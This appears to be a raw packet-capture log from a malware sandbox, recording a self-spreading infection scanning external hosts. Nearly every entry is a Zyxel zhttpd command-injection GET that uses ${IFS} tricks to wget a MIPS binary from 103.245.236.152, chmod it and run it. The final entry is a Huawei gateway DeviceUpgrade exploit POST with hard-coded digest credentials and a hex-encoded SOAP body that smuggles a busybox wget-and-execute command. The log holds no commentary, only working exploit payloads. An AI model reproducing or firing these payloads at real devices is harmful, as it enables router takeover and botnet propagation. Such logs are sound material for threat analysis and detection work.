                                            Jan 14, 2024 15:50:55.746012926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8778192.168.2.235154470.109.142.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746067047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8779192.168.2.235184075.172.151.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746104002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8780192.168.2.2334852138.44.79.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746160984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8781192.168.2.233659419.139.111.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746184111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8782192.168.2.2359432105.111.239.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746253014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8783192.168.2.233849097.91.176.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746315956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8784192.168.2.2358586209.194.249.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746356964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8785192.168.2.235965462.80.89.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746412992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8786192.168.2.235692868.170.167.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746447086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8787192.168.2.2350042128.130.245.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746490955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8788192.168.2.2340156145.255.252.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746495962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8789192.168.2.236003823.185.94.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746526957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8790192.168.2.2353594165.220.173.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746572018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8791192.168.2.2345406182.198.228.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746611118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8792192.168.2.235805012.148.124.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746632099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8793192.168.2.234496662.174.210.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746685982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8794192.168.2.2359944129.219.182.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746742964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8795192.168.2.2338274167.234.86.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746800900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8796192.168.2.2356268196.181.94.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746860981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8797192.168.2.2356984180.113.237.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746870041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8798192.168.2.2352340189.89.198.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746925116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8799192.168.2.234264412.208.223.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.746993065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8800192.168.2.2337216156.18.166.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747003078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8801192.168.2.2355838114.247.24.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747034073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8802192.168.2.2352384111.46.48.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747090101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8803192.168.2.2354082124.61.176.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747169971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8804192.168.2.23331382.142.59.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747241020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8805192.168.2.2338476221.240.6.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747268915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8806192.168.2.235195878.66.201.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747324944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8807192.168.2.2352738176.15.215.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747340918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8808192.168.2.2348714183.171.195.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747431040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8809192.168.2.2343784183.174.23.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747461081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8810192.168.2.2357204222.215.10.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747478962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8811192.168.2.2358596108.33.92.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747536898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8812192.168.2.233639090.51.180.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747596979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8813192.168.2.2349630145.70.124.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747629881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8814192.168.2.235929097.128.146.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747673035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8815192.168.2.2356284200.158.228.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747714996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8816192.168.2.235828871.130.229.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747746944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8817192.168.2.2336072198.178.8.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747791052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8818192.168.2.2347368138.16.48.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747819901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8819192.168.2.2342522142.91.100.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747850895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8820192.168.2.234369060.86.2.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747881889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8821192.168.2.235198613.211.160.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.747942924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8822192.168.2.2344956140.33.113.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748002052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8823192.168.2.2359114203.61.97.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748034954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8824192.168.2.2343002151.145.221.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748054981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8825192.168.2.2341456110.53.231.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748083115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8826192.168.2.2342246176.49.161.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748157024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8827192.168.2.2333898180.9.148.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748213053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8828192.168.2.2335056124.153.53.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.748266935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8829192.168.2.234065640.36.53.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.752103090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8830192.168.2.234107294.37.170.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.752567053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8831192.168.2.23333641.104.61.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.752638102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8832192.168.2.233494089.115.231.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.752679110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8833192.168.2.233933869.229.99.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.752717972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8834192.168.2.2342180108.55.173.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:55.752756119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8835192.168.2.2358822179.127.33.12837215
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.531542063 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Content-Length: 475
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 